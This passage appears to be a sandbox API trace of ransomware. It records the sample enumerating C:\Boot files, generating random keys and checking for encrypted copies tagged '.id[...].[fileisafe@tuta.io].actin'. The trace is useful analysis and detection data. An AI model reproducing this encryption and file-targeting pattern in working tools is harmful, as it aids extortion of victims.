GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui")) returned 0x20 [0059.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.586] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.586] SetEvent (hEvent=0x2e8) returned 1 [0059.586] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.586] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.586] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=92576) returned 1 [0059.587] CloseHandle (hObject=0x300) returned 1 [0059.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll")) returned 0x20 [0059.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\resources\\bootres.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.587] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\bootres.dll" (normalized: "c:\\boot\\resources\\bootres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.587] SetEvent (hEvent=0x2e8) returned 1 [0059.587] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.587] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.587] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=12192) returned 1 [0059.587] CloseHandle (hObject=0x300) returned 1 [0059.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui")) returned 0x20 [0059.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.587] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Resources\\en-US\\bootres.dll.mui" (normalized: "c:\\boot\\resources\\en-us\\bootres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.587] SetEvent (hEvent=0x2e8) returned 1 [0059.588] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.588] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.588] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=76128) returned 1 [0059.588] CloseHandle (hObject=0x300) returned 1 [0059.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui")) returned 0x20 [0059.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.588] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ro-RO\\bootmgr.exe.mui" (normalized: "c:\\boot\\ro-ro\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.588] SetEvent (hEvent=0x2e8) returned 1 [0059.588] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.588] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.589] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77152) returned 1 [0059.589] CloseHandle (hObject=0x300) returned 1 [0059.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui")) returned 0x20 [0059.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.589] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.589] SetEvent (hEvent=0x2e8) returned 1 [0059.589] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.589] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.589] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=44960) returned 1 [0059.589] CloseHandle (hObject=0x300) returned 1 [0059.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui")) returned 0x20 [0059.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.589] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.590] SetEvent (hEvent=0x2e8) returned 1 [0059.590] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.590] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.590] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77144) returned 1 [0059.590] CloseHandle (hObject=0x300) returned 1 [0059.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui")) returned 0x20 [0059.590] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.590] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.590] SetEvent (hEvent=0x2e8) returned 1 [0059.591] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.591] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.591] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=76640) returned 1 [0059.591] CloseHandle (hObject=0x300) returned 1 [0059.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui")) returned 0x20 [0059.591] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.591] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.591] SetEvent (hEvent=0x2e8) returned 1 [0059.591] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.591] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.591] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77152) returned 1 [0059.591] CloseHandle (hObject=0x300) returned 1 [0059.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui")) returned 0x20 [0059.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.592] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.592] SetEvent (hEvent=0x2e8) returned 1 [0059.592] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.592] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.592] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=44888) returned 1 [0059.592] CloseHandle (hObject=0x300) returned 1 [0059.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui")) returned 0x20 [0059.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.592] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.592] SetEvent (hEvent=0x2e8) returned 1 [0059.593] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.593] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.593] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77152) returned 1 [0059.593] CloseHandle (hObject=0x300) returned 1 [0059.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui")) returned 0x20 [0059.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.593] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.593] SetEvent (hEvent=0x2e8) returned 1 [0059.593] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.593] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.594] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=76128) returned 1 [0059.594] CloseHandle (hObject=0x300) returned 1 [0059.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0059.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.594] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.594] SetEvent (hEvent=0x2e8) returned 1 [0059.594] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.594] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.594] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=44952) returned 1 [0059.594] CloseHandle (hObject=0x300) returned 1 [0059.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui")) returned 0x20 [0059.594] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.594] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.595] SetEvent (hEvent=0x2e8) returned 1 [0059.595] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.595] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.595] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=75096) returned 1 [0059.595] CloseHandle (hObject=0x300) returned 1 [0059.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0059.595] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.595] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.595] SetEvent (hEvent=0x2e8) returned 1 [0059.595] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.596] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.596] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=45472) returned 1 [0059.596] CloseHandle (hObject=0x300) returned 1 [0059.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui")) returned 0x20 [0059.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.596] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.596] SetEvent (hEvent=0x2e8) returned 1 [0059.596] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.596] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.596] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=77152) returned 1 [0059.596] CloseHandle (hObject=0x300) returned 1 [0059.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui")) returned 0x20 [0059.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.597] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.597] SetEvent (hEvent=0x2e8) returned 1 [0059.597] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.597] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.598] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=4662) returned 1 [0059.598] CloseHandle (hObject=0x300) returned 1 [0059.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0059.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.598] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.598] SetEvent (hEvent=0x2e8) returned 1 [0059.598] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.598] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.598] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=63840) returned 1 [0059.599] CloseHandle (hObject=0x300) returned 1 [0059.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0059.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.599] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.601] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.601] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0059.601] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=42400) returned 1 [0059.602] CloseHandle (hObject=0x300) returned 1 [0059.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui")) returned 0x20 [0059.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0059.602] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.602] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0059.602] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: 